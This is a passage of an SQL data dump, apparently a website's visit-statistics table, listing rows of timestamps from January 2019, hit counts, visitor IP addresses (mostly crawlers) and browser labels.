377844,1548467495,1,1,0,0,'54.36.148.255','other'),(377845,1548467534,1,1,0,0,'54.36.148.206','other'),(377846,1548467603,1,1,0,0,'207.46.13.60','other'),(377847,1548467765,1,1,0,0,'66.249.69.124','chrome'),(377848,1548468261,6,6,0,0,'216.244.66.241','other'),(377849,1548468693,1,1,0,0,'178.154.171.27','other'),(377850,1548468704,1,1,0,0,'8.29.198.27','other'),(377851,1548468807,1,1,0,0,'213.180.203.9','other'),(377852,1548468816,1,1,0,0,'66.249.69.124','chrome'),(377853,1548468888,1,1,0,0,'54.36.149.77','other'),(377854,1548468926,1,1,0,0,'178.154.244.11','other'),(377855,1548469164,5,5,0,0,'216.244.66.241','other'),(377856,1548469197,1,1,0,0,'54.36.148.102','other'),(377857,1548469511,1,1,0,0,'54.36.149.31','other'),(377858,1548469588,1,1,0,0,'54.36.148.145','other'),(377859,1548469624,1,1,0,0,'54.36.149.28','other'),(377860,1548469851,1,1,0,0,'46.229.168.151','other'),(377861,1548469885,1,1,0,0,'54.36.148.96','other'),(377862,1548470197,1,1,0,0,'66.249.69.126','chrome'),(377863,1548470204,1,1,0,0,'54.36.148.93','other'),(377864,1548470220,2,2,0,0,'40.77.167.35','other'),(377865,1548470502,1,1,0,0,'157.55.39.125','other'),(377866,1548470766,1,1,0,0,'46.229.168.138','other'),(377867,1548470827,1,1,0,0,'8.29.198.26','other'),(377868,1548470884,1,1,0,0,'141.8.142.103','other'),(377869,1548470922,1,1,0,0,'54.36.149.41','other'),(377870,1548471000,1,1,0,0,'54.36.149.9','other'),(377871,1548471044,11,11,0,0,'216.244.66.241','other'),(377872,1548471249,1,1,0,0,'54.36.148.112','other'),(377873,1548471828,1,1,0,0,'54.36.148.84','other'),(377874,1548471866,1,1,0,0,'207.46.13.60','other'),(377875,1548471892,1,1,0,0,'54.36.149.95','other'),(377876,1548471977,3,3,0,0,'216.244.66.241','other'),(377877,1548472103,1,1,0,0,'46.229.168.132','other'),(377878,1548472455,1,1,0,0,'54.36.149.100','other'),(377879,1548472534,1,1,0,0,'54.36.149.18','other'),(377880,1548472803,1,1,0,0,'54.36.148.35','other'),(377881,1548473086,1,1,0,0,'40.77.167.35','other'),(377882,1548473752,17,17,0,0,'216.244.66.241','other'),(377883,1548473849,1,1,0,0,'54.36.149.81','other'),(377884,1548473850,2,2,0,0,'34.217.193.101','chrome'),(377885,1548474016,1,1,0,0,'54.36.148.246','other'),(377886,1548474077,1,1,0,0,'54.36.148.174','other'),(377887,1548474330,1,1,0,0,'54.36.149.3','other'),(377888,1548474376,1,1,0,0,'66.249.69.124','chrome'),(377889,1548474392,1,1,0,0,'54.36.149.80','other'),(377890,1548474511,1,1,0,0,'66.249.69.122','chrome'),(377891,1548474910,1,1,0,0,'54.36.148.209','other'),(377892,1548475010,1,1,0,0,'46.229.168.150','other'),(377893,1548475679,3,3,0,0,'216.244.66.241','other'),(377894,1548475772,1,1,0,0,'66.249.69.126','chrome'),(377895,1548475789,1,1,0,0,'66.249.69.74','chrome'),(377896,1548475811,1,1,0,0,'157.55.39.125','other'),(377897,1548476081,1,1,0,0,'178.133.118.205','chrome'),(377898,1548476412,1,1,0,0,'54.36.148.127','other'),(377899,1548476424,1,1,0,0,'40.77.167.215','other'),(377900,1548476789,2,2,0,0,'66.249.69.122','chrome'),(377901,1548476800,15,15,0,0,'216.244.66.241','other'),(377902,1548476983,1,1,0,0,'157.55.39.125','other'),(377903,1548477000,1,1,0,0,'95.163.255.93','other'),(377904,1548477611,1,1,0,0,'46.229.168.153','other'),(377905,1548477708,1,1,0,0,'40.77.167.35','other'),(377906,1548478382,4,4,0,0,'216.244.66.241','other'),(377907,1548478550,1,1,0,0,'54.36.149.68','other'),(377908,1548478668,2,2,0,0,'95.213.141.126','opera'),(377909,1548479358,9,9,0,0,'216.244.66.241','other'),(377910,1548479473,1,1,0,0,'23.228.96.82','chrome'),(377911,1548479537,1,1,0,0,'8.29.198.26','other'),(377912,1548479598,1,1,0,0,'54.36.148.201','other'),(377913,1548480015,1,1,0,0,'54.36.149.70','other'),(377914,1548480144,1,1,0,0,'207.46.13.60','other'),(377915,1548480147,1,1,0,0,'54.36.148.235','other'),(377916,1548480305,1,1,0,0,'54.36.148.243','other'),(377917,1548480706,1,1,0,0,'66.249.69.126','chrome'),(377918,1548480958,1,1,0,0,'54.36.149.32','other'),(377919,1548481033,1,1,0,0,'66.249.69.122','chrome'),(377920,1548481093,1,1,0,0,'46.229.168.152','other'),(377921,1548481187,2,2,0,0,'95.108.213.4','other'),(377922,1548481200,2,2,0,0,'54.36.148.100','other'),(377923,1548481350,4,4,0,0,'178.154.244.11','other'),(377924,1548481529,1,1,0,0,'5.45.207.79','other'),(377925,1548481671,1,1,0,0,'54.36.148.71','other'),(377926,1548481676,1,1,0,0,'8.29.198.25','other'),(377927,1548481871,1,1,0,0,'157.55.39.140','other'),(377928,1548481922,1,1,0,0,'141.8.142.103','other'),(377929,1548481988,3,3,0,0,'216.244.66.241','other'),(377930,1548482181,1,1,0,0,'66.249.69.122','chrome'),(377931,1548482258,1,1,0,0,'52.53.201.78','chrome'),(377932,1548482286,1,1,0,0,'95.108.213.4','other'),(377933,1548482322,1,1,0,0,'209.17.96.42','other'),(377934,1548482615,2,2,0,0,'178.154.244.11','other'),(377935,1548482631,1,1,0,0,'54.36.148.106','other'),(377936,1548482683,3,3,0,0,'5.45.207.79','other'),(377937,1548482718,1,1,0,0,'54.36.148.217','other'),(377938,1548482755,1,1,0,0,'40.77.167.35','other'),(377939,1548482971,1,1,0,0,'85.248.227.165','other'),(377940,1548482990,8,8,0,0,'216.244.66.241','other'),(377941,1548483130,1,1,0,0,'66.249.69.126','chrome'),(377942,1548483261,1,1,0,0,'54.36.148.56','other'),(377943,1548483281,1,1,0,0,'66.249.69.122','chrome'),(377944,1548483420,1,1,0,0,'54.36.148.194','other'),(377945,1548483491,1,1,0,0,'54.36.149.32','other'),(377946,1548483492,1,1,0,0,'103.36.11.162','firefox'),(377947,1548484047,1,1,0,0,'54.36.148.68','other'),(377948,1548484389,1,1,0,0,'54.36.149.50','other'),(377949,1548484771,14,14,0,0,'216.244.66.241','other'),(377950,1548484801,1,1,0,0,'54.36.149.68','other'),(377951,1548484819,1,1,0,0,'66.249.69.126','chrome'),(377952,1548485382,1,1,0,0,'54.36.149.20','other'),(377953,1548486018,1,1,0,0,'46.229.168.151','other'),(377954,1548486064,1,1,0,0,'66.249.69.124','chrome'),(377955,1548486366,1,1,0,0,'66.249.69.74','chrome'),(377956,1548486371,1,1,0,0,'216.244.66.241','other'),(377957,1548486402,1,1,0,0,'54.36.148.45','other'),(377958,1548486455,1,1,0,0,'207.46.13.60','other'),(377959,1548486647,1,1,0,0,'54.36.148.184','other'),(377960,1548486690,1,1,0,0,'46.229.168.148','other'),(377961,1548486745,1,1,0,0,'54.36.148.149','other'),(377962,1548487051,1,1,0,0,'54.36.148.50','other'),(377963,1548487169,1,1,0,0,'46.229.168.147','other'),(377964,1548487514,11,11,0,0,'216.244.66.241','other'),(377965,1548487732,1,1,0,0,'157.55.39.125','other'),(377966,1548488605,1,1,0,0,'46.229.168.146','other'),(377967,1548488953,3,3,0,0,'216.244.66.241','other'),(377968,1548489104,1,1,0,0,'54.36.148.14','other'),(377969,1548489436,1,1,0,0,'46.229.168.152','other'),(377970,1548489650,1,1,0,0,'66.249.69.74','chrome'),(377971,1548489888,1,1,0,0,'54.36.148.209','other'),(377972,1548490276,14,14,0,0,'216.244.66.241','other'),(377973,1548490376,1,1,0,0,'8.29.198.25','other'),(377974,1548490547,1,1,0,0,'5.45.207.79','other'),(377975,1548490914,1,1,0,0,'54.36.149.77','other'),(377976,1548490934,1,1,0,0,'46.211.127.130','chrome'),(377977,1548490948,1,1,0,0,'207.46.13.53','other'),(377978,1548491227,4,4,0,0,'216.244.66.241','other'),(377979,1548491245,1,1,0,0,'54.36.148.200','other'),(377980,1548491602,1,1,0,0,'54.36.148.171','other'),(377981,1548491637,1,1,0,0,'54.36.148.133','other'),(377982,1548491687,1,1,0,0,'13.66.139.0','other'),(377983,1548491784,1,1,0,0,'54.36.149.1','other'),(377984,1548491917,1,1,0,0,'46.211.127.130','chrome'),(377985,1548492225,1,1,0,0,'54.36.148.145','other'),(377986,1548492524,1,1,0,0,'8.29.198.25','other'),(377987,1548492627,1,1,0,0,'54.36.148.52','other'),(377988,1548492837,1,1,0,0,'54.36.149.84','other'),(377989,1548493023,1,1,0,0,'46.229.168.148','other'),(377990,1548493046,6,6,0,0,'216.244.66.241','other'),(377991,1548493263,1,1,0,0,'46.229.168.136','other'),(377992,1548493300,1,1,0,0,'46.229.168.149','other'),(377993,1548493332,1,1,0,0,'54.36.148.155','other'),(377994,1548493459,1,1,0,0,'157.55.13.65','other'),(377995,1548493615,1,1,0,0,'54.36.148.150','other'),(377996,1548493753,1,1,0,0,'66.249.69.126','chrome'),(377997,1548493848,1,1,0,0,'54.36.148.202','other'),(377998,1548493983,7,7,0,0,'216.244.66.241','other'),(377999,1548494223,2,2,0,0,'5.45.207.19','other'),(378000,1548494284,1,1,0,0,'54.36.148.133','other'),(378001,1548494342,2,2,0,0,'37.9.113.20','other'),(378002,1548494450,1,1,0,0,'95.108.213.4','other'),(378003,1548494456,1,1,0,0,'141.8.142.103','other'),(378004,1548494596,3,3,0,0,'178.154.244.11','other'),(378005,1548494855,1,1,0,0,'66.249.69.126','chrome'),(378006,1548494947,1,1,0,0,'37.9.113.148','other'),(378007,1548495113,1,1,0,0,'46.229.168.138','other'),(378008,1548495382,1,1,0,0,'5.45.207.79','other'),(378009,1548495801,8,8,0,0,'216.244.66.241','other'),(378010,1548495803,1,1,0,0,'173.252.87.10','chrome'),(378011,1548496136,2,2,0,0,'178.154.244.11','other'),(378012,1548496181,1,1,0,0,'95.163.255.178','other'),(378013,1548496490,1,1,0,0,'54.36.149.69','other'),(378014,1548496602,1,1,0,0,'66.249.69.126','chrome'),(378015,1548496753,8,8,0,0,'216.244.66.241','other'),(378016,1548496995,1,1,0,0,'54.36.148.19','other'),(378017,1548497225,1,1,0,0,'54.36.149.31','other'),(378018,1548497300,1,1,0,0,'54.36.148.177','other'),(378019,1548497369,1,1,0,0,'40.77.167.98','other'),(378020,1548497568,1,1,0,0,'54.36.148.139','other'),(378021,1548498559,5,5,0,0,'216.244.66.241','other'),(378022,1548498787,1,1,0,0,'54.36.148.66','other'),(378023,1548498835,1,1,0,0,'54.36.148.103','other'),(378024,1548499252,1,1,0,0,'54.36.148.35','other'),(378025,1548499483,11,11,0,0,'216.244.66.241','other'),(378026,1548499535,1,1,0,0,'40.77.167.98','other'),(378027,1548499629,2,2,0,0,'66.249.69.124','chrome'),(378028,1548499687,1,1,0,0,'54.36.148.161','other'),(378029,1548500013,1,1,0,0,'46.229.168.153','other'),(378030,1548500190,1,1,0,0,'54.36.148.166','other'),(378031,1548500404,1,1,0,0,'54.36.149.97','other'),(378032,1548500748,1,1,0,0,'46.211.133.22','chrome'),(378033,1548500777,1,1,0,0,'54.36.149.93','other'),(378034,1548500949,1,1,0,0,'66.249.69.126','chrome'),(378035,1548500998,1,1,0,0,'54.36.149.25','other'),(378036,1548501193,1,1,0,0,'46.229.168.132','other'),(378037,1548501211,1,1,0,0,'8.29.198.25','other'),(378038,1548501308,3,3,0,0,'216.244.66.241','other'),(378039,1548501334,1,1,0,0,'54.36.148.98','other'),(378040,1548501519,1,1,0,0,'54.36.148.189','other'),(378041,1548501857,1,1,0,0,'54.36.148.97','other'),(378042,1548501970,1,1,0,0,'66.249.69.126','chrome'),(378043,1548502124,1,1,0,0,'91.196.178.45','chrome'),(378044,1548502217,6,6,0,0,'216.244.66.241','other'),(378045,1548502255,1,1,0,0,'46.229.168.153','other'),(378046,1548502264,1,1,0,0,'54.36.148.237','other'),(378047,1548502326,1,1,0,0,'207.46.13.53','other'),(378048,1548502421,1,1,0,0,'54.36.148.87','other'),(378049,1548503224,1,1,0,0,'54.36.148.61','other'),(378050,1548503373,1,1,0,0,'8.29.198.26','other'),(378051,1548503831,2,2,0,0,'40.77.167.98','other'),(378052,1548504043,8,8,0,0,'216.244.66.241','other'),(378053,1548504125,1,1,0,0,'54.36.149.72','other'),(378054,1548504292,1,1,0,0,'54.36.148.47','other'),(378055,1548504579,1,1,0,0,'95.163.255.95','other'),(378056,1548504582,1,1,0,0,'95.163.255.92','other'),(378057,1548504645,1,1,0,0,'207.46.13.53','other'),(378058,1548505066,6,6,0,0,'216.244.66.241','other'),(378059,1548505671,1,1,0,0,'54.36.148.220','other'),(378060,1548505765,1,1,0,0,'54.36.149.16','other'),(378061,1548505859,1,1,0,0,'54.36.149.104','other'),(378062,1548505898,1,1,0,0,'54.36.148.127','other'),(378063,1548505908,1,1,0,0,'54.36.148.109','other'),(378064,1548506543,1,1,0,0,'54.36.149.66','other'),(378065,1548506551,2,2,0,0,'66.249.69.126','chrome'),(378066,1548506794,4,4,0,0,'216.244.66.241','other'),(378067,1548506906,1,1,0,0,'54.36.148.195','other'),(378068,1548507074,1,1,0,0,'31.28.163.44','firefox'),(378069,1548507284,1,1,0,0,'66.249.69.122','chrome'),(378070,1548507330,2,2,0,0,'95.108.213.4','other'),(378071,1548507564,3,3,0,0,'178.154.244.11','other'),(378072,1548507670,1,1,0,0,'54.36.148.37','other'),(378073,1548507710,11,11,0,0,'216.244.66.241','other'),(378074,1548507882,1,1,0,0,'46.229.168.132','other'),(378075,1548508298,1,1,0,0,'54.36.149.2','other'),(378076,1548508535,1,1,0,0,'66.249.69.126','chrome'),(378077,1548508823,3,3,0,0,'5.45.207.79','other'),(378078,1548508842,1,1,0,0,'54.36.149.49','other'),(378079,1548509240,1,1,0,0,'5.45.207.19','other'),(378080,1548509553,12,12,0,0,'216.244.66.241','other'),(378081,1548509654,1,1,0,0,'178.154.244.11','other'),(378082,1548509695,1,1,0,0,'46.229.168.154','other'),(378083,1548509726,1,1,0,0,'46.229.168.130','other'),(378084,1548510081,1,1,0,0,'54.36.149.102','other'),(378085,1548510099,1,1,0,0,'66.249.69.126','chrome'),(378086,1548510183,1,1,0,0,'66.249.69.122','chrome'),(378087,1548510265,1,1,0,0,'54.36.148.15','other'),(378088,1548510469,5,5,0,0,'216.244.66.241','other'),(378089,1548510655,1,1,0,0,'54.36.148.173','other'),(378090,1548510872,1,1,0,0,'66.249.69.124','chrome'),(378091,1548510965,1,1,0,0,'46.229.168.145','other'),(378092,1548511022,1,1,0,0,'46.229.168.133','other'),(378093,1548511084,1,1,0,0,'46.229.168.153','other'),(378094,1548511654,1,1,0,0,'54.36.148.27','other'),(378095,1548511830,1,1,0,0,'66.249.69.124','chrome'),(378096,1548511893,1,1,0,0,'40.77.167.59','other'),(378097,1548511899,1,1,0,0,'91.209.11.236','other'),(378098,1548511958,1,1,0,0,'46.211.26.2','chrome'),(378099,1548512044,1,1,0,0,'8.29.198.25','other'),(378100,1548512107,1,1,0,0,'54.36.148.239','other'),(378101,1548512309,1,1,0,0,'46.229.168.146','other'),(378102,1548512317,3,3,0,0,'216.244.66.241','other'),(378103,1548512677,1,1,0,0,'54.36.148.165','other'),(378104,1548513100,1,1,0,0,'66.249.69.72','chrome'),(378105,1548513181,1,1,0,0,'185.30.201.52','chrome'),(378106,1548513198,1,1,0,0,'54.36.148.48','other'),(378107,1548513204,1,1,0,0,'54.36.148.136','other'),(378108,1548513313,8,8,0,0,'216.244.66.241','other'),(378109,1548513367,1,1,0,0,'46.229.168.136','other'),(378110,1548513403,1,1,0,0,'66.249.69.122','chrome'),(378111,1548513503,1,1,0,0,'54.36.148.69','other'),(378112,1548514221,1,1,0,0,'8.29.198.26','other'),(378113,1548514281,2,2,0,0,'216.244.66.241','other'),(378114,1548514733,1,1,0,0,'46.211.26.2','chrome'),(378115,1548514896,1,1,0,0,'95.163.255.99','other'),(378116,1548515134,1,1,0,0,'66.249.69.126','chrome'),(378117,1548515226,10,10,0,0,'216.244.66.241','other'),(378118,1548515337,1,1,0,0,'54.36.148.222','other'),(378119,1548515384,1,1,0,0,'54.36.149.67','other'),(378120,1548516143,3,3,0,0,'216.244.66.241','other'),(378121,1548516379,1,1,0,0,'66.249.69.126','chrome'),(378122,1548516480,1,1,0,0,'54.36.148.186','other'),(378123,1548516614,1,1,0,0,'46.229.168.140','other'),(378124,1548516654,2,2,0,0,'157.55.39.239','other'),(378125,1548517205,1,1,0,0,'138.201.205.208','firefox'),(378126,1548517367,1,1,0,0,'54.36.148.155','other'),(378127,1548517766,1,1,0,0,'54.36.148.75','other'),(378128,1548517782,2,2,0,0,'46.211.26.2','chrome'),(378129,1548517799,17,17,0,0,'216.244.66.241','other'),(378130,1548518303,1,1,0,0,'5.45.207.19','other'),(378131,1548518481,1,1,0,0,'54.36.148.25','other'),(378132,1548518687,1,1,0,0,'46.211.26.2','chrome'),(378133,1548518960,1,1,0,0,'54.36.148.196','other'),(378134,1548519153,1,1,0,0,'157.55.39.238','other'),(378135,1548519491,1,1,0,0,'216.244.66.241','other'),(378136,1548519747,1,1,0,0,'54.36.149.11','other'),(378137,1548519885,2,2,0,0,'66.249.69.122','chrome'),(378138,1548519977,1,1,0,0,'178.154.244.11','other'),(378139,1548519993,1,1,0,0,'87.250.224.65','other'),(378140,1548520062,1,1,0,0,'54.36.148.238','other'),(378141,1548520173,1,1,0,0,'54.36.149.20','other'),(378142,1548520337,1,1,0,0,'46.229.168.129','other'),(378143,1548520402,1,1,0,0,'54.36.149.25','other'),(378144,1548520405,1,1,0,0,'95.163.255.92','other'),(378145,1548520520,1,1,0,0,'54.36.149.37','other'),(378146,1548520558,2,2,0,0,'216.244.66.241','other'),(378147,1548520607,1,1,0,0,'54.36.149.68','other'),(378148,1548520609,1,1,0,0,'141.8.142.103','other'),(378149,1548520691,2,2,0,0,'5.45.207.79','other'),(378150,1548521012,2,2,0,0,'178.154.244.11','other'),(378151,1548521363,1,1,0,0,'54.36.148.183','other'),(378152,1548521545,3,3,0,0,'216.244.66.241','other'),(378153,1548521549,2,2,0,0,'66.249.69.122','chrome'),(378154,1548521608,1,1,0,0,'95.108.213.4','other'),(378155,1548521844,1,1,0,0,'66.249.69.74','chrome'),(378156,1548521857,1,1,0,0,'54.36.149.48','other'),(378157,1548522386,1,1,0,0,'46.211.27.24','chrome'),(378158,1548522599,1,1,0,0,'54.36.148.222','other'),(378159,1548522843,1,1,0,0,'40.77.167.59','other'),(378160,1548522876,1,1,0,0,'8.29.198.27','other'),(378161,1548523316,6,6,0,0,'216.244.66.241','other'),(378162,1548523525,1,1,0,0,'54.36.148.71','other'),(378163,1548523605,1,1,0,0,'54.36.148.252','other'),(378164,1548523628,1,1,0,0,'54.36.148.32','other'),(378165,1548523711,1,1,0,0,'54.36.149.40','other'),(378166,1548523879,1,1,0,0,'54.36.149.62','other'),(378167,1548524093,1,1,0,0,'66.249.69.122','chrome'),(378168,1548524256,7,7,0,0,'216.244.66.241','other'),(378169,1548524441,2,2,0,0,'66.249.69.126','chrome'),(378170,1548524644,1,1,0,0,'54.36.148.236','other'),(378171,1548524688,1,1,0,0,'54.36.148.153','other'),(378172,1548524896,1,1,0,0,'66.249.69.124','chrome'),(378173,1548525063,1,1,0,0,'8.29.198.26','other'),(378174,1548525174,1,1,0,0,'216.244.66.241','other'),(378175,1548525487,1,1,0,0,'5.45.207.19','other'),(378176,1548525578,3,3,0,0,'66.249.69.126','chrome'),(378177,1548525884,1,1,0,0,'157.55.39.239','other'),(378178,1548526098,5,5,0,0,'216.244.66.241','other'),(378179,1548526317,1,1,0,0,'66.249.69.122','chrome'),(378180,1548526629,1,1,0,0,'157.55.39.238','other'),(378181,1548526763,1,1,0,0,'91.196.178.91','firefox'),(378182,1548526887,1,1,0,0,'46.229.168.148','other'),(378183,1548526898,1,1,0,0,'54.36.149.91','other'),(378184,1548527009,1,1,0,0,'46.229.168.154','other'),(378185,1548527031,6,6,0,0,'216.244.66.241','other'),(378186,1548527259,2,2,0,0,'66.249.69.122','chrome'),(378187,1548527958,2,2,0,0,'216.244.66.241','other'),(378188,1548528013,1,1,0,0,'54.36.148.231','other'),(378189,1548528555,1,1,0,0,'66.249.69.126','chrome'),(378190,1548528606,1,1,0,0,'46.211.54.125','chrome'),(378191,1548528793,1,1,0,0,'66.249.69.74','chrome'),(378192,1548528876,7,7,0,0,'216.244.66.241','other'),(378193,1548529317,1,1,0,0,'157.55.39.238','other'),(378194,1548529530,2,2,0,0,'66.249.69.122','chrome'),(378195,1548529531,1,1,0,0,'54.36.148.94','other'),(378196,1548529894,5,5,0,0,'216.244.66.241','other'),(378197,1548530012,1,1,0,0,'46.229.168.152','other'),(378198,1548530069,1,1,0,0,'66.249.69.126','chrome'),(378199,1548530111,1,1,0,0,'54.36.148.61','other'),(378200,1548530259,1,1,0,0,'54.36.148.221','other'),(378201,1548530463,1,1,0,0,'40.77.167.133','other'),(378202,1548530491,2,2,0,0,'66.249.69.122','chrome'),(378203,1548530497,1,1,0,0,'46.229.168.150','other'),(378204,1548531173,1,1,0,0,'46.229.168.136','other'),(378205,1548531479,1,1,0,0,'54.36.148.184','other'),(378206,1548531496,1,1,0,0,'54.36.148.243','other'),(378207,1548531581,4,4,0,0,'216.244.66.241','other'),(378208,1548531894,1,1,0,0,'54.36.148.81','other'),(378209,1548532079,1,1,0,0,'54.36.148.136','other'),(378210,1548532134,1,1,0,0,'157.55.39.239','other'),(378211,1548532219,1,1,0,0,'54.36.148.148','other'),(378212,1548532377,1,1,0,0,'157.55.39.238','other'),(378213,1548532457,2,2,0,0,'46.229.168.151','other'),(378214,1548532540,5,5,0,0,'216.244.66.241','other'),(378215,1548532891,1,1,0,0,'46.211.48.240','chrome'),(378216,1548533076,1,1,0,0,'54.36.148.94','other'),(378217,1548533391,1,1,0,0,'66.249.69.122','chrome'),(378218,1548533445,1,1,0,0,'54.36.149.55','other'),(378219,1548533566,1,1,0,0,'54.36.148.71','other'),(378220,1548533638,1,1,0,0,'46.229.168.134','other'),(378221,1548533714,1,1,0,0,'8.29.198.25','other'),(378222,1548533937,1,1,0,0,'46.229.168.150','other'),(378223,1548533998,1,1,0,0,'54.36.148.203','other'),(378224,1548534145,1,1,0,0,'54.36.148.164','other'),(378225,1548534339,5,5,0,0,'216.244.66.241','other'),(378226,1548534455,2,2,0,0,'157.55.39.239','other'),(378227,1548534540,2,2,0,0,'5.45.207.79','other'),(378228,1548534656,1,1,0,0,'141.8.142.103','other'),(378229,1548534811,1,1,0,0,'54.36.148.245','other'),(378230,1548535025,1,1,0,0,'178.154.244.11','other'),(378231,1548535246,2,2,0,0,'216.244.66.241','other'),(378232,1548535349,1,1,0,0,'54.36.148.51','other'),(378233,1548535754,1,1,0,0,'95.108.213.4','other'),(378234,1548535799,1,1,0,0,'87.250.224.65','other'),(378235,1548535812,1,1,0,0,'95.108.181.75','other'),(378236,1548535910,1,1,0,0,'8.29.198.26','other'),(378237,1548535956,2,2,0,0,'46.229.168.138','other'),(378238,1548535995,1,1,0,0,'54.36.148.154','other'),(378239,1548535996,1,1,0,0,'141.8.142.108','other'),(378240,1548535999,1,1,0,0,'54.36.148.16','other'),(378241,1548536266,1,1,0,0,'40.77.167.204','other'),(378242,1548536357,1,1,0,0,'54.36.148.104','other'),(378243,1548536714,1,1,0,0,'5.45.207.19','other'),(378244,1548536721,1,1,0,0,'66.249.69.122','chrome'),(378245,1548536759,1,1,0,0,'54.36.148.128','other'),(378246,1548536767,1,1,0,0,'46.229.168.130','other'),(378247,1548536878,1,1,0,0,'54.36.149.47','other'),(378248,1548537335,1,1,0,0,'216.244.66.241','other'),(378249,1548537382,1,1,0,0,'66.249.69.124','chrome'),(378250,1548537789,1,1,0,0,'40.77.167.204','other'),(378251,1548537792,1,1,0,0,'54.36.148.61','other'),(378252,1548537869,1,1,0,0,'66.249.69.126','chrome'),(378253,1548538289,1,1,0,0,'91.196.177.208','chrome'),(378254,1548538320,1,1,0,0,'54.36.148.11','other'),(378255,1548538657,1,1,0,0,'66.249.69.72','chrome'),(378256,1548538736,1,1,0,0,'54.36.148.57','other'),(378257,1548538856,1,1,0,0,'207.46.13.81','other'),(378258,1548538952,2,2,0,0,'216.244.66.241','other'),(378259,1548539090,1,1,0,0,'46.135.88.144','chrome'),(378260,1548539407,1,1,0,0,'66.249.69.126','chrome'),(378261,1548539445,1,1,0,0,'54.36.148.130','other'),(378262,1548539574,1,1,0,0,'54.36.148.249','other'),(378263,1548539686,1,1,0,0,'54.36.149.11','other'),(378264,1548539725,1,1,0,0,'91.196.178.79','chrome'),(378265,1548539854,7,7,0,0,'216.244.66.241','other'),(378266,1548540089,1,1,0,0,'46.229.168.146','other'),(378267,1548540325,1,1,0,0,'54.36.148.11','other'),(378268,1548540858,1,1,0,0,'40.77.167.204','other'),(378269,1548540876,1,1,0,0,'54.36.148.163','other'),(378270,1548540949,1,1,0,0,'207.46.13.80','other'),(378271,1548540954,1,1,0,0,'54.36.149.18','other'),(378272,1548541003,11,11,0,0,'216.244.66.241','other'),(378273,1548541056,1,1,0,0,'54.36.148.162','other'),(378274,1548541328,1,1,0,0,'54.36.148.144','other'),(378275,1548541424,1,1,0,0,'173.252.127.33','other'),(378276,1548541905,1,1,0,0,'207.46.13.80','other'),(378277,1548542200,3,3,0,0,'66.249.69.122','chrome'),(378278,1548542608,8,8,0,0,'216.244.66.241','other'),(378279,1548542853,1,1,0,0,'54.36.148.249','other'),(378280,1548543051,1,1,0,0,'46.229.168.129','other'),(378281,1548543170,1,1,0,0,'207.46.13.35','other'),(378282,1548543258,1,1,0,0,'54.36.148.16','other'),(378283,1548543284,1,1,0,0,'54.36.148.176','other'),(378284,1548543434,1,1,0,0,'54.36.148.71','other'),(378285,1548543580,1,1,0,0,'216.244.66.241','other'),(378286,1548543734,1,1,0,0,'66.249.69.126','chrome'),(378287,1548543787,1,1,0,0,'54.36.148.199','other'),(378288,1548544151,1,1,0,0,'54.36.148.123','other'),(378289,1548544556,1,1,0,0,'8.29.198.27','other'),(378290,1548544628,1,0,1,0,'66.249.69.122',''),(378291,1548544796,1,1,0,0,'207.46.13.35','other'),(378292,1548544983,1,1,0,0,'54.36.148.70','other'),(378293,1548545332,1,1,0,0,'46.229.168.133','other'),(378294,1548545370,5,5,0,0,'216.244.66.241','other'),(378295,1548545707,1,1,0,0,'54.36.148.209','other'),(378296,1548545895,1,1,0,0,'66.249.69.126','chrome'),(378297,1548545974,1,1,0,0,'37.9.113.103','other'),(378298,1548545976,1,1,0,0,'37.9.113.20','other'),(378299,1548546011,1,1,0,0,'54.36.148.97','other'),(378300,1548546280,1,1,0,0,'216.244.66.241','other'),(378301,1548546602,1,1,0,0,'157.55.13.65','other'),(378302,1548546678,1,1,0,0,'66.249.69.122','chrome'),(378303,1548546748,1,1,0,0,'8.29.198.27','other'),(378304,1548546851,1,1,0,0,'46.229.168.152','other'),(378305,1548547189,1,1,0,0,'87.250.224.65','other'),(378306,1548547242,1,1,0,0,'193.138.245.58','firefox'),(378307,1548547319,5,5,0,0,'207.46.13.199','other'),(378308,1548547323,9,9,0,0,'207.46.13.88','other'),(378309,1548547338,12,12,0,0,'207.46.13.81','other'),(378310,1548547354,7,7,0,0,'207.46.13.35','other'),(378311,1548547435,1,1,0,0,'54.36.148.180','other'),(378312,1548547760,1,1,0,0,'66.249.69.124','chrome'),(378313,1548547858,1,1,0,0,'5.45.207.19','other'),(378314,1548548094,1,1,0,0,'46.229.168.148','other'),(378315,1548548148,13,13,0,0,'216.244.66.241','other'),(378316,1548548334,1,1,0,0,'54.36.148.193','other'),(378317,1548548424,1,1,0,0,'31.184.238.190','chrome'),(378318,1548548434,2,2,0,0,'207.46.13.81','other'),(378319,1548548567,1,1,0,0,'207.46.13.88','other'),(378320,1548549145,2,2,0,0,'216.244.66.241','other'),(378321,1548549314,1,1,0,0,'46.229.168.133','other'),(378322,1548549564,1,1,0,0,'46.229.168.150','other'),(378323,1548549597,1,1,0,0,'54.36.148.207','other'),(378324,1548549970,1,1,0,0,'46.229.168.153','other'),(378325,1548550040,1,1,0,0,'46.229.168.135','other'),(378326,1548550233,1,1,0,0,'46.229.168.148','other'),(378327,1548550545,1,1,0,0,'195.123.228.161','other'),(378328,1548550870,2,2,0,0,'207.46.13.199','other'),(378329,1548550908,1,1,0,0,'66.249.69.74','chrome'),(378330,1548550924,9,9,0,0,'216.244.66.241','other'),(378331,1548551243,1,1,0,0,'54.36.148.202','other'),(378332,1548551655,1,1,0,0,'54.36.148.165','other'),(378333,1548551887,4,4,0,0,'216.244.66.241','other'),(378334,1548551916,1,1,0,0,'46.229.168.150','other'),(378335,1548552107,1,1,0,0,'207.46.13.214','other'),(378336,1548552170,1,1,0,0,'54.36.148.248','other'),(378337,1548552171,1,1,0,0,'39.98.176.120','other'),(378338,1548552273,1,1,0,0,'54.36.148.146','other'),(378339,1548552383,1,1,0,0,'66.249.69.74','chrome'),(378340,1548553028,1,1,0,0,'34.194.219.167','firefox'),(378341,1548553045,1,1,0,0,'46.229.168.140','other'),(378342,1548553084,1,1,0,0,'66.249.69.122','chrome'),(378343,1548553473,2,2,0,0,'207.46.13.81','other'),(378344,1548553683,12,12,0,0,'216.244.66.241','other'),(378345,1548554198,1,1,0,0,'46.229.168.143','other'),(378346,1548554426,3,3,0,0,'66.249.69.124','chrome'),(378347,1548554687,1,1,0,0,'54.36.148.14','other'),(378348,1548554774,4,4,0,0,'216.244.66.241','other'),(378349,1548555394,1,1,0,0,'8.29.198.25','other'),(378350,1548555937,1,1,0,0,'46.229.168.144','other'),(378351,1548556074,1,1,0,0,'207.46.13.88','other'),(378352,1548556207,1,1,0,0,'54.36.149.91','other'),(378353,1548556305,1,1,0,0,'46.229.168.132','other'),(378354,1548556440,2,2,0,0,'93.170.116.116','firefox'),